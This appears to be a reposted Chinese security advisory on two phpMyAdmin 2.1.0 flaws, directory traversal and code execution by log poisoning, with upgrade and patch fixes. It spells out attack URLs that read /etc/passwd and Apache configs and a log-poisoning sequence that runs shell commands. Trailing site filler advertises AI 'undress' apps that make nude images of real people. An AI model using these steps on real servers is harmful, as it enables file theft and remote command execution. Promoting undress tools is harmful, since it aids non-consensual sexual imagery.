phpMyAdmin2.1.0存在两个漏洞
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1386
52
How to set primary key in phpmyadmin
Apr 07, 2024 pm 02:54 PM
The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.
How to add foreign keys in phpmyadmin
Apr 07, 2024 pm 02:36 PM
Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.
Where does the wordpress database exist?
Apr 15, 2024 pm 10:39 PM
The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.
How to delete data table in phpmyadmin
Apr 07, 2024 pm 03:00 PM
Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.
What kind of vulnerability does the phpmyadmin vulnerability belong to?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin is susceptible to multiple vulnerabilities, including: 1. SQL injection vulnerability; 2. Cross-site scripting (XSS) vulnerability; 3. Remote code execution (RCE) vulnerability; 4. Local file inclusion (LFI) vulnerability; 5. Information disclosure Vulnerability; 6. Privilege escalation vulnerability.
How to export excel using phpmyadmin
Apr 07, 2024 pm 02:24 PM
Export data to Excel format via phpMyAdmin: After logging in to phpMyAdmin, select the database and table to export. Click the "Export" option and select "Excel" in the "Format" drop-down menu. Choose your own export columns, query options, and other export options. Click the "Dump" button to start the export and download the exported Excel file.
What should I do if navicat cannot connect?
Apr 23, 2024 am 10:00 AM
When Navicat cannot connect, you can try the following solutions in order: Check whether the connection information is correct, such as database name, host name, port number, user name and password. Make sure the database is up and running. Check the firewall rules to confirm that Navicat and related services are not blocked. Try using the ping command to test your network connection. Update Navicat client software to the latest version. Check the server logs for error messages related to failed connections. Try connecting using other database tools to troubleshoot Navicat-specific issues.
How to change the default password of Empire CMS
Apr 16, 2024 pm 03:21 PM
Reset the Empire CMS default password through the following steps: Log in to the database and find the user table. Edit the administrator user (username is admin). Modify the value in the password field. Save the changes and use the new password to log in to the management backend.
